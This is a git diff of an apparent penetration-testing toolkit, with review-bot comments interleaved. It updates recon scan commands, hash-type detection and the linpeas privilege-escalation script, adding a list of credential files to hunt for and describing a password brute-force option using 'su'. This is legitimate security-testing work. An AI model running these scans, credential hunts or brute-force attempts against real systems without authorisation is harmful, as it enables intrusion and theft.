diff --git a/autorecon.py b/autorecon.py
index 5b4c07f..e9bfd78 100644
--- a/autorecon.py
+++ b/autorecon.py
@@ -221,7 +221,12 @@ def calculate_elapsed_time(start_time):
 async def read_stream(stream, target, tag='?', patterns=[], color=Fore.BLUE):
 address = target.address
 while True:
- line = await stream.readline()
+ line = ""
+ try:
+ line = await stream.readline()
+ except ValueError:
+ continue
+
+ if line:
 line = str(line.rstrip(), 'utf8', 'ignore')
 debug(color + '[' + Style.BRIGHT + address + ' ' + tag + Style.NORMAL + '] ' + Fore.RESET + '{line}', color=color)
@@ -878,4 +883,3 @@ def main():
 if __name__ == '__main__':
 main()
-
diff --git a/autorecon_config/service-scans.toml b/autorecon_config/service-scans.toml
index f51fced..55197e4 100644
--- a/autorecon_config/service-scans.toml
+++ b/autorecon_config/service-scans.toml
@@ -59,7 +59,7 @@ service-names = [
 ]
 [[finger.scan]]
- nmap = 'nmap-finger'
+ name = 'nmap-finger'
 command = 'nmap {nmap_extra} -sV -p {port} --script="banner,finger" -oN "{scandir}/{protocol}_{port}_finger_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_finger_nmap.xml" {address}'
 [ftp]
@@ -126,8 +126,8 @@ ignore-service-names = [
 command = 'whatweb --color=never --no-errors -a 3 -v {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_whatweb.txt"'
 [[http.scan]]
- name = 'ffuf'
- command = 'ffuf -u {scheme}://{address}:{port}/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf.txt'
+ name = 'feroxbuster'
+ command = 'feroxbuster -u {scheme}://{address}:{port} -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -o {scandir}/{protocol}_{port}_{scheme}_feroxbuster.txt'
 [[http.manual]]
 description = '(nikto) old but generally reliable web server enumeration tool'
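Review bot: The new `except ValueError: continue` in read_stream discards, with no record at all, the line that `stream.readline()` refused — presumably the ValueError asyncio's StreamReader raises when a line exceeds the stream's buffer limit — so over-long tool output silently goes missing from the scan log. Record the drop before continuing, e.g. `except ValueError: debug(color + '[' + address + ' ' + tag + '] dropped an over-long output line', color=color); continue`, so a truncated result is at least visible in debug output. The `line = ""` initialiser above the `try` is dead: every path out of the `try` either assigns `line` or continues. read_stream's body continues outside the hunk.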
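Review bot: The new feroxbuster command passes `-o {scandir}/{protocol}_{port}_{scheme}_feroxbuster.txt` unquoted, whereas the gobuster commands in this file quote their output path (`-o "{scandir}/..."`), so a scan directory containing a space or shell metacharacter splits the argument and the report lands in the wrong place or the command fails. Quote it: `-o "{scandir}/{protocol}_{port}_{scheme}_feroxbuster.txt"`. The two feroxbuster commands in the `@@ -136` hunk have the same unquoted `-o` argument and should be quoted the same way.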
@@ -136,10 +136,10 @@ ignore-service-names = [ ] [[http.manual]] - description = '(ffuf) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:' + description = '(feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:' commands = [ - 'ffuf -u {scheme}://{address}:{port}/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf_big.txt', - 'ffuf -u {scheme}://{address}:{port}/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf_dirbuster.txt' + 'feroxbuster -u {scheme}://{address}:{port} -t 10 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -o {scandir}/{protocol}_{port}_{scheme}_feroxbuster_big.txt', + 'feroxbuster -u {scheme}://{address}:{port} -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -o {scandir}/{protocol}_{port}_{scheme}_feroxbuster_dirbuster.txt' ] [[http.manual]] 
@@ -159,8 +159,8 @@ ignore-service-names = [ [[http.manual]] description = '(gobuster v3) Directory/file enumeration for web servers using various wordlists (same as dirb above):' commands = [ - 'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e -k -l -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_big.txt"', - 'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -l -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_dirbuster.txt"' + 'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_big.txt"', + 'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_dirbuster.txt"' ] [[http.manual]] diff --git a/crack_hash.py b/crack_hash.py index 97e9792..7348abf 100755 --- a/crack_hash.py +++ b/crack_hash.py @@ -65,6 +65,7 @@ class HashType(enum.Enum): LM = 3000 NTLM = 1000 MSSQL = 1731 + NTLMV2_SSP = 5600 # Kerberos KERBEROS_AS_REQ = 7500 @@ -109,9 +110,15 @@ class Hash: elif crypt_type == "S": self.type.append(HashType.DRUPAL7) else: - self.isSalted = ":" in raw_hash - if self.isSalted: - raw_hash, self.salt = raw_hash.split(":") + if ":" in raw_hash: + parts = raw_hash.split(":") + if len(parts) == 2: + self.isSalted = True + raw_hash, self.salt = raw_hash.split(":") + elif len(parts) == 6: + self.type.append(HashType.NTLMV2_SSP) + + # Base64 -> hex try: diff --git a/fileserver.py b/fileserver.py index 44e9522..ca62b61 100755 --- a/fileserver.py +++ b/fileserver.py 
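Review bot: In the `len(parts) == 2` branch the hash is split a second time with `raw_hash, self.salt = raw_hash.split(":")` although `parts` already holds that result; `raw_hash, self.salt = parts` is the clearer form. The old code always assigned `self.isSalted`, while the new code only sets it to True in the two-field case, so a colon-containing string with any other field count now leaves `isSalted` untouched — fine if it is initialised elsewhere in the method, otherwise add `self.isSalted = False` before the `if`. A six-field split on its own may also match other colon-delimited challenge/response formats, so checking the length of the proof field before appending `HashType.NTLMV2_SSP` would make the tag more robust. The enclosing method continues outside the hunk.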
@@ -132,7 +132,7 @@ class HttpFileServer(HTTPServer): data = data.encode("UTF-8") # return 200 - OK and data - self.addRoute(name, lambda req: (data, 200)) + self.addRoute(name, lambda req: (200, data)) def dumpRequest(self, name): self.dumpRequests.append(self.cleanPath(name)) diff --git a/linpeas.sh b/linpeas.sh index ecf5a2b..cd02365 100755 --- a/linpeas.sh +++ b/linpeas.sh @@ -1,6 +1,6 @@ #!/bin/sh -VERSION="v3.2.0" +VERSION="v3.2.6" ADVISORY="This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission." ########################################### @@ -15,17 +15,25 @@ else fi -########################################### +########################################### #---------------) Colors (----------------# ########################################### C=$(printf '\033') RED="${C}[1;31m" +SED_RED="${C}[1;31m&${C}[0m" GREEN="${C}[1;32m" -Y="${C}[1;33m" -B="${C}[1;34m" +SED_GREEN="${C}[1;32m&${C}[0m" +YELLOW="${C}[1;33m" +SED_YELLOW="${C}[1;33m&${C}[0m" +SED_RED_YELLOW="${C}[1;31;103m&${C}[0m" +BLUE="${C}[1;34m" +SED_BLUE="${C}[1;34m&${C}[0m" +ITALIC_BLUE="${C}[1;34m${C}[3m" LG="${C}[1;37m" #LightGray +SED_LG="${C}[1;37m&${C}[0m" DG="${C}[1;90m" #DarkGray +SED_DG="${C}[1;90m&${C}[0m" NC="${C}[0m" UNDERLINED="${C}[5m" ITALIC="${C}[3m" 
@@ -47,31 +55,34 @@ QUIET="" CHECKS="SysI,Container,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles" WAIT="" PASSWORD="" +NOCOLOR="" +VERBOSE="" THREADS="`((grep -c processor /proc/cpuinfo 2>/dev/null) || ((command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n"`" [ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2 [ -n "$THREADS" ] && eTHREADS="2" #If THREADS is null, put number 2 [ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" #It THREADS is not a number, put number 2 HELP=$GREEN"Enumerate and search Privilege Escalation vectors. ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors. - $Y-h$B To show this message - $Y-q$B Do not show banner - $Y-a$B All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly - $Y-s$B SuperFast (don't check some time consuming checks) - Stealth mode - $Y-w$B Wait execution between big blocks - $Y-n$B Do not export env variables related with history and do not check Internet connectivity - $Y-P$B Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' - $Y-o$B Only execute selected checks (SysI, Container, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list. - $Y-L$B Force linpeas execution. - $Y-M$B Force macpeas execution. - $Y-t$B Threads to search files inside the system (by default it's the number of CPU threads). - $Y-d $B Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 - $Y-p -d $B Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). 
You can also add a list of ports.$DG Ex: -d 192.168.0.1/24 -p 53,139 - $Y-i [-p ]$B Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080 - $GREEN Notice$B that if you select some network action, no PE check will be performed\n\n$NC" + ${YELLOW}-h${BLUE} To show this message + ${YELLOW}-q${BLUE} Do not show banner + ${YELLOW}-a${BLUE} All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly + ${YELLOW}-s${BLUE} SuperFast (don't check some time consuming checks) - Stealth mode + ${YELLOW}-w${BLUE} Wait execution between big blocks + ${YELLOW}-n${BLUE} Do not export env variables related with history and do not check Internet connectivity + ${YELLOW}-N${BLUE} Do not use colours + ${YELLOW}-v${BLUE} Verbose execution + ${YELLOW}-P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' + ${YELLOW}-o${BLUE} Only execute selected checks (SysI, Container, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list. + ${YELLOW}-L${BLUE} Force linpeas execution. + ${YELLOW}-M${BLUE} Force macpeas execution. + ${YELLOW}-d ${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 + ${YELLOW}-p -d ${BLUE} Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports.$DG Ex: -d 192.168.0.1/24 -p 53,139 + ${YELLOW}-i [-p ]${BLUE} Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080 + $GREEN Notice${BLUE} that if you select some network action, no PE check will be performed$NC" -while getopts "h?asnd:p:i:P:qo:LMwt:" opt; do +while getopts "h?asnd:p:i:P:qo:LMwNv" opt; do case "$opt" in - h|\?) 
printf "$HELP"$NC; exit 0;; + h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;; a) FAST="";; s) SUPERFAST=1;; n) NOTEXPORT=1;; @@ -84,11 +95,32 @@ while getopts "h?asnd:p:i:P:qo:LMwt:" opt; do L) MACPEAS="";; M) MACPEAS="1";; w) WAIT=1;; - t) THREADS=$OPTARG;; + N) NOCOLOR="1";; + v) VERBOSE="1";; esac done if [ "$MACPEAS" ]; then SCRIPTNAME="macpeas"; else SCRIPTNAME="linpeas"; fi +if [ "$NOCOLOR" ]; then + C="" + RED="" + SED_RED="" + GREEN="" + SED_GREEN="" + YELLOW="" + SED_YELLOW="" + SED_RED_YELLOW="" + BLUE="" + SED_BLUE="" + ITALIC_BLUE="" + LG="" + SED_LG="" + DG="" + SED_DG="" + NC="" + UNDERLINED="" + ITALIC="" +fi ########################################### 
@@ -124,7 +156,7 @@ print_banner(){ \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;22;48;5;16m \e[38;5;16;48;5;16m▓\e[38;5;22;48;5;233m \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;70m░\e[38;5;22;48;5;22m \e[38;5;16;48;5;16m▓\e[38;5;119;48;5;233m░\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[0m 
\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;233m░\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;233m░\e[38;5;119;48;5;64m▒\e[38;5;119;48;5;70m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;70m▒\e[38;5;119;48;5;234m▒\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;237m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[0m '"; - + else if [ -f "/bin/bash" ]; then /bin/bash -c "printf ' 
@@ -153,7 +185,7 @@ print_banner(){ \e[48;2;95;106;94m\e[38;2;253;253;253m▄\e[48;2;81;137;65m\e[38;2;243;243;243m▄\e[48;2;91;166;73m\e[38;2;182;185;181m▄\e[48;2;95;174;76m\e[38;2;61;73;59m▄\e[48;2;98;177;78m\e[38;2;33;66;26m▄\e[48;2;98;177;78m\e[38;2;81;143;65m▄\e[48;2;98;177;78m\e[38;2;102;182;81m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;99;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;97;177;77m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m\e[38;2;99;179;78m▄\e[48;2;98;177;78m\e[38;2;93;169;74m▄\e[48;2;98;177;78m\e[38;2;56;106;44m▄\e[48;2;96;174;77m\e[38;2;16;31;13m▄\e[48;2;68;126;54m\e[38;2;58;58;58m▄\e[48;2;28;50;23m\e[38;2;180;180;180m▄\e[48;2;20;22;20m\e[38;2;240;240;240m▄\e[48;2;86;85;86m\e[38;2;253;253;253m▄\e[48;2;199;199;199m\e[38;2;255;255;255m▄ \e[0m 
\e[48;2;146;147;145m\e[38;2;254;254;254m▄\e[48;2;41;52;39m\e[38;2;242;242;242m▄\e[48;2;39;76;30m\e[38;2;192;192;192m▄\e[48;2;73;136;57m\e[38;2;132;134;132m▄\e[48;2;90;162;72m\e[38;2;96;100;95m▄\e[48;2;99;175;79m\e[38;2;60;69;58m▄\e[48;2;98;177;78m\e[38;2;46;59;43m▄\e[48;2;98;177;78m\e[38;2;32;51;27m▄\e[48;2;98;178;78m\e[38;2;28;50;23m▄\e[48;2;98;178;78m\e[38;2;28;55;22m▄\e[48;2;98;178;78m\e[38;2;35;64;28m▄\e[48;2;98;177;78m\e[38;2;41;75;33m▄\e[48;2;98;177;78m\e[38;2;50;89;41m▄\e[48;2;98;177;77m\e[38;2;54;89;45m▄\e[48;2;98;177;77m\e[38;2;53;89;44m▄\e[48;2;98;177;78m\e[38;2;49;86;39m▄\e[48;2;98;177;78m\e[38;2;45;83;36m▄\e[48;2;98;177;78m\e[38;2;40;74;32m▄\e[48;2;98;177;78m\e[38;2;35;64;28m▄\e[48;2;98;178;78m\e[38;2;39;60;33m▄\e[48;2;90;163;71m\e[38;2;55;61;53m▄\e[48;2;53;97;41m\e[38;2;111;111;111m▄\e[48;2;24;44;19m\e[38;2;186;186;186m▄\e[48;2;36;41;35m\e[38;2;242;242;242m▄\e[48;2;132;131;132m\e[38;2;255;255;255m▄\e[0m '"; - + else echo " \e[48;5;108m \e[48;5;59m \e[48;5;71m \e[48;5;77m \e[48;5;22m \e[48;5;108m \e[48;5;114m \e[48;5;59m \e[49m \e[48;5;108m \e[48;5;71m \e[48;5;22m \e[48;5;113m \e[48;5;71m \e[48;5;94m \e[48;5;214m \e[48;5;58m \e[48;5;214m \e[48;5;100m \e[48;5;71m \e[48;5;16m \e[48;5;108m \e[49m 
@@ -179,21 +211,21 @@ print_banner(){ echo "" if [ !"$QUIET" ]; then print_banner; fi -printf $B" $SCRIPTNAME $VERSION ${Y}by carlospolop\n"$NC; +printf ${BLUE}" $SCRIPTNAME $VERSION ${YELLOW}by carlospolop\n"$NC; echo "" -printf $Y"ADVISORY: "$B"$ADVISORY\n"$NC +printf ${YELLOW}"ADVISORY: "${BLUE}"$ADVISORY\n"$NC echo "" -printf $B"Linux Privesc Checklist: "$Y"https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist\n"$NC +printf ${BLUE}"Linux Privesc Checklist: "${YELLOW}"https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist\n"$NC echo " LEGEND:" | sed "s,LEGEND,${C}[1;4m&${C}[0m," -echo " RED/YELLOW: 95% a PE vector" | sed "s,RED/YELLOW,${C}[1;31;103m&${C}[0m," -echo " RED: You must take a look at it" | sed "s,RED,${C}[1;31m&${C}[0m," +echo " RED/YELLOW: 95% a PE vector" | sed "s,RED/YELLOW,${SED_RED_YELLOW}," +echo " RED: You should take a look to it" | sed "s,RED,${SED_RED}," echo " LightCyan: Users with console" | sed "s,LightCyan,${C}[1;96m&${C}[0m," -echo " Blue: Users without console & mounted devs" | sed "s,Blue,${C}[1;34m&${C}[0m," -echo " Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) " | sed "s,Green,${C}[1;32m&${C}[0m," +echo " Blue: Users without console & mounted devs" | sed "s,Blue,${SED_BLUE}," +echo " Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) " | sed "s,Green,${SED_GREEN}," echo " LightMagenta: Your username" | sed "s,LightMagenta,${C}[1;95m&${C}[0m," if [ "$IAMROOT" ]; then echo "" - echo " YOU ARE ALREADY ROOT!!! (it could take longer to complete execution)" | sed "s,YOU ARE ALREADY ROOT!!!,${C}[1;31;103m&${C}[0m," + echo " YOU ARE ALREADY ROOT!!! (it could take longer to complete execution)" | sed "s,YOU ARE ALREADY ROOT!!!,${SED_RED_YELLOW}," sleep 3 fi echo "" 
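Review bot: The LEGEND, LightCyan and LightMagenta lines still build their sed replacement from `${C}[...]&${C}[0m` directly, while the neighbouring lines were moved to `${SED_RED_YELLOW}`/`${SED_RED}`/`${SED_BLUE}`/`${SED_GREEN}`; with the new `-N` flag `C` is emptied, so those three lines print literal `[1;4m`, `[1;96m` and `[1;95m` fragments around the words instead of plain text. Give them `SED_*` variables alongside the others (defined with the colours and cleared in the NOCOLOR block), e.g. `echo " LightCyan: Users with console" | sed "s,LightCyan,${SED_LIGHT_CYAN},"`, where `SED_LIGHT_CYAN` is a new variable following the existing `SED_LG` pattern. The same applies to the `${C}[1;4m` used for LEGEND.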
@@ -340,7 +372,7 @@ if [ $? -ne 0 ] ; then if [ $? -eq 0 ] ; then E=r else - echo "${Y}WARNING: No suitable option found for extended regex with sed. Continuing but the results might be unreliable.${NC}" + echo "${YELLOW}WARNING: No suitable option found for extended regex with sed. Continuing but the results might be unreliable.${NC}" fi fi @@ -394,7 +426,7 @@ PASSTRY="2000" #Default num of passwds to try (all by default) if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this SEDOVERFLOW=true -for grp in `groups $USER 2>/dev/null | cut -d ":" -f2`; do +for grp in `groups $USER 2>/dev/null | cut -d ":" -f2`; do wgroups="$wgroups -group $grp -or " done wgroups="`echo $wgroups | sed -e 's/ -or$//'`" @@ -405,9 +437,9 @@ while $SEDOVERFLOW; do #else # WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" -and '(' -writable -or -user $USER ')' 2>/dev/null | sort` #fi - Wfolders=`printf "$WF" | tr '\n' '|'`"|[^\*][^\ ]*\ \*" - Wfolder="`printf "$WF" | grep "tmp\|shm\|home\|Users\|root\|etc\|var\|opt\|bin\|lib\|mnt\|private\|Applications" | head -n1`" - printf "test\ntest\ntest\ntest"| sed -${E} "s,$Wfolders|\./|\.:|:\.,${C}[1;31;103m&${C}[0m,g" >/dev/null 2>&1 + Wfolders=`printf "%s" "$WF" | tr '\n' '|'`"|[^\*][^\ ]*\ \*" + Wfolder="`printf "%s" "$WF" | grep "tmp\|shm\|home\|Users\|root\|etc\|var\|opt\|bin\|lib\|mnt\|private\|Applications" | head -n1`" + printf "test\ntest\ntest\ntest"| sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" >/dev/null 2>&1 if [ $? -eq 0 ]; then SEDOVERFLOW=false else 
@@ -441,9 +473,9 @@ profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh| knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com" -timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ureadahead-stop.timer" +timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-messaging.timer|ureadahead-stop.timer" -commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib64$|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$" +commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib32$|libx32$|/lib64$|lost\+found|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$" commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes" 
ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib" @@ -456,6 +488,8 @@ GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSys GREP_DOCKER_SOCK_INFOS_IGNORE="IndexConfig" GREP_IGNORE_MOUNTS="/ /|/cgroup|/var/lib/docker/|/null | proc proc |/dev/console|docker.sock" +INT_HIDDEN_FILES=".rhosts|.irssi|.keyring|.cer|.jks|.service|.vnc|.p12|.ftpconfig|.crt|.lesshst|.git-credentials|._history|.sudo_as_admin_successful|.timer|.gnupg|.gpg|.sqlite3|.recently-used.xbel|.erlang.cookie|.socket|.pem|.cloudflared|.bashrc|.git|.pypirc|.csr|.plan|.rdg|.ovpn|.pfx|.gitconfig|.svn|.der|.sqlite|.google_authenticator|.viminfo|.bluemix|.htpasswd|.kdbx|.mozilla|.env|.vault-token|.ldaprc|.swp|.msmtprc|.profile|.github|.pgp|.keystore|.db|.k5login|.key" + ########################################### #---------) Checks before start (---------# ########################################### @@ -470,10 +504,10 @@ DISCOVER_BAN_BAD="No network discovery capabilities (fping or ping not found)" FPING=$(command -v fping 2>/dev/null) PING=$(command -v ping 2>/dev/null) if [ "$FPING" ]; then - DISCOVER_BAN_GOOD="$GREEN$FPING$B is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" + DISCOVER_BAN_GOOD="$GREEN$FPING${BLUE} is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" else if [ "$PING" ]; then - DISCOVER_BAN_GOOD="$GREEN$PING$B is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" + DISCOVER_BAN_GOOD="$GREEN$PING${BLUE} is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" fi fi 
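Review bot: The two entries added to `commonrootdirsG`, `libx32$` and `lost\+found`, are anchored differently from every other entry in the list: `libx32$` lacks the leading `/`, and `lost\+found` has neither the `/` prefix nor the `$` suffix, so if this pattern is consumed by `sed -${E}` or `grep -E` like the other lists it excludes any path that merely contains `lost+found` or ends in `libx32`. `/libx32$` and `/lost\+found$` keep the list consistent, and the pre-existing `/lost+found$` alternative (where an unescaped `+` is a quantifier under extended regex) could then be dropped.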
@@ -492,7 +526,7 @@ if [ -z "$FOUND_NC" ]; then FOUND_NC=$(command -v nc.openbsd 2>/dev/null); fi if [ "$FOUND_NC" ]; then - SCAN_BAN_GOOD="$GREEN$FOUND_NC$B is available for network discover & port scanning$LG ($SCRIPTNAME can discover hosts and scan ports, learn more with -h)" + SCAN_BAN_GOOD="$GREEN$FOUND_NC${BLUE} is available for network discover & port scanning$LG ($SCRIPTNAME can discover hosts and scan ports, learn more with -h)" fi 
@@ -501,29 +535,83 @@ fi
 ###########################################
 echo_not_found (){
- printf $DG"$1 Not Found\n"$NC
+ if [ "$VERBOSE" ]; then
+ printf $DG"$1 Not Found\n"$NC
+ fi
+}
+
+warn_exec(){
+ $* || echo_not_found $1
 }
 echo_no (){
